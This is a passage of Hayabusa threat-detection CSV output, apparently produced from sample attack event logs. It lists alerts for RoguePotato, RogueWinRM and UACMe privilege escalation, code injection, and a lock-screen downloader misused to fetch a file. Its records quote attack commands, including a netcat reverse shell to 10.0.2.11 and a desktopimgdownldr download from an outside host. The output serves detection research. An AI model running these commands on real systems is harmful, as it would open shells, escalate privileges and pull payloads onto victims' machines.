Cmd: ""cmd.exe"" | LID: 
0x3e5 | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: c:\Users\IEUser\tools\PrivEsc\RoguePotato.exe | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-545A-5EBA-0000-0010EB030000,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | Process: C:\Users\IEUser\Tools\Misc\nc64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | LID: 0x3e7 | PID: 4468 | PGUID: 
747F3D96-DE14-5EB9-0000-00107C0F4300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | LID: 0x3e7 | PID: 224 | PGUID: 747F3D96-DE14-5EB9-0000-001079154300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 5252 | PGUID: 747F3D96-DE32-5EB9-0000-00103FC14300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Akagi.exe 58 c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89eef | PID: 1036 | PGUID: 
747F3D96-BB89-5EBA-0000-001057413600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.183 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - Rogue Windir - UAC bypass prep | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: C:\Users\IEUser\AppData\Local\Temp\DNeruK | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.184 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 328 310 0000028A37652590 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6968 | PGUID: 747F3D96-BB89-5EBA-0000-0010FB4C3600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | Process: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | User: MSEDGEWIN10\IEUser | 
Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41} | LID: 0x89ebf | PID: 1088 | PGUID: 747F3D96-BB89-5EBA-0000-001042653600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | LID: 0x89ebf | PID: 4688 | PGUID: 747F3D96-BB89-5EBA-0000-001019683600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | LID: 0x3e7 | PID: 8052 | PGUID: 747F3D96-3F20-5EBB-0000-0010035E3600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx 
+2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3080 | PGUID: 747F3D96-3F44-5EBB-0000-001017813700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6344 | PGUID: 747F3D96-3F44-5EBB-0000-0010EA933700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6372 | PGUID: 747F3D96-3F44-5EBB-0000-0010D29A3700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS | Process: 
C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 1516 | PGUID: 747F3D96-CA4E-5EC9-0000-00109FE23700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:50.330 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: 
C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 4456 | PGUID: 747F3D96-CA52-5EC9-0000-001027FA3700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,low,Evas,Use Remove-Item to Delete File,,rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,Exec,Malicious PowerShell 
Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx +2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,Evasion Suspicious NtOpenProcess Call | Src Process: C:\Users\Public\za3bollo.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1972 | Src PGUID: 747F3D96-A591-5EFB-0000-00109FE4CC01 | Tgt PID: 2996 | Tgt PGUID: 747F3D96-59BB-5EFB-0000-0010D81B6400,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Exec,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: spooler.exe payload.bin | Process: C:\Users\Public\tools\cinj\spooler.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89c8f | PID: 6892 | PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00 | Hash: 
SHA1=68044D72A9FF02839E0164AEB8DFF1EB9B88A94B,MD5=508317C4844B1D2945713CC909D6431D,SHA256=0EB4AFA7216C4BC5E313ECA3EBAF0BD59B90EFF77A246AEF78491AA4FC619A17,IMPHASH=620745A90090718A46AC492610FE8EB4",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.822 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\conhost.exe | Tgt Process: c:\Users\Public\tools\cinj\spooler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 640 | Src PGUID: 747F3D96-1E44-5EFE-0000-001060463700 | Tgt PID: 6892 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3344 | PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\spoolsv.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 747F3D96-1CDA-5EFE-0000-0010E0780100 | Tgt PID: 3344 | Tgt PGUID: 
747F3D96-1EA9-5EFE-0000-00102BF53D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: chost.exe payload.bin | Process: C:\Users\Public\tools\evasion\chost.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" | LID: 0x37e846b4 | PID: 16900 | PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A | Hash: SHA1=06A1D9CC580F1CC239E643302CAB9166E0DF6355,MD5=7724B90C1D66AB3FA2A781E344AD2BE5,SHA256=805CA4E5A08C2366923D46680FDFBAD8C3012AB6A93D518624C377FA8A610A43,IMPHASH=A4DE9CE85347166ACB42B7FA4676BF25",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.617 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\Users\Public\tools\evasion\chost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16900 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1 | LID: 0x37e846b4 | PID: 16788 | PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Evas,Conhost Parent Process Executions,,rules/sigma/process_creation/proc_creation_win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16788 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89ccc | PID: 1932 | PGUID: 
747F3D96-F098-5EFE-0000-001012E13801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\desktopimgdownldr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | LID: 0x89ccc | PID: 4604 | PGUID: 747F3D96-F098-5EFE-0000-001090E33801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Personalization\LockScreenImage\LockScreenImage_uXQ8IiHL80mkJsKc319JaA.7z | Process: C:\Windows\System32\svchost.exe | PID: 1556 | PGUID: 747F3D96-2178-5EFE-0000-0010AADA5800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Evas,Suspicious Desktopimgdownldr Target 
File,,rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Download LockScreen Image | URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: explorer.exe /root,""c:\windows\System32\calc.exe"" | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf3072 | PID: 6860 | PGUID: 6661D424-F4F6-5EFE-0000-0010E7EFF800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Evas,Proxy Execution Via 